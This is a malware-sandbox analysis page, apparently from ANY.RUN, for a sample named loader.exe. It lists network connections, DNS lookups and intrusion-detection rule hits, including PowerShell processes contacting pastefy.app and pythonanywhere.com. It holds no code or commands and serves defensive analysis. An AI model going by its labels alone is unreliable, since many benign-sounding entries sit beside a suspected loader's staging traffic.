Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
Not routed
whitelisted
5392
svchost.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5276
MoUsoCoreWorker.exe
20.73.194.208:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
92.123.104.38:443
www.bing.com
AKAMAI-ASN1
NL
whitelisted
48.192.1.65:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
23.11.41.157:80
ocsp.digicert.com
AKAMAI-AMS
NL
whitelisted
204.79.197.203:80
oneocsp.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
4
System
192.168.100.255:138
Not routed
whitelisted
5392
svchost.exe
2.16.164.49:80
crl.microsoft.com
AKAMAI-ASN1
NL
whitelisted
5392
svchost.exe
23.52.181.212:80
www.microsoft.com
AKAMAI-AS
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 20.73.194.208
  • 40.127.240.158
whitelisted
www.bing.com
  • 92.123.104.38
  • 92.123.104.34
  • 92.123.104.63
  • 92.123.104.31
  • 92.123.104.32
whitelisted
activation-v2.sls.microsoft.com
  • 48.192.1.65
whitelisted
ocsp.digicert.com
  • 23.11.41.157
whitelisted
oneocsp.microsoft.com
  • 204.79.197.203
whitelisted
google.com
  • 142.250.154.102
  • 142.250.154.139
  • 142.250.154.100
  • 142.250.154.101
  • 142.250.154.113
  • 142.250.154.138
whitelisted
crl.microsoft.com
  • 2.16.164.49
  • 2.16.164.120
whitelisted
www.microsoft.com
  • 23.52.181.212
  • 88.221.169.152
whitelisted
gitlab.com
  • 172.65.251.78
whitelisted
www.python.org
  • 151.101.0.223
  • 151.101.128.223
  • 151.101.64.223
  • 151.101.192.223
whitelisted

Threats

PID
Process
Class
Message
5392
svchost.exe
Unknown Traffic
ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
7408
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
1312
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
2232
svchost.exe
Misc activity
ET INFO Pastebin-like Service Domain in DNS Lookup (pastefy .app)
1312
powershell.exe
Misc activity
ET INFO Observed Pastebin-like Service (pastefy .app) in TLS SNI
1312
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
2232
svchost.exe
Misc activity
ET INFO Cloud IDE/Code Hosting Domain in DNS Lookup (pythonanywhere .com)
7724
powershell.exe
Misc activity
ET INFO Observed Cloud IDE/Code Hosting Domain (pythonanywhere .com) in TLS SNI
1312
powershell.exe
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
7724
powershell.exe
Misc activity
ET INFO Observed HTTP Request to *.pythonanywhere .com Domain
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
loader.exe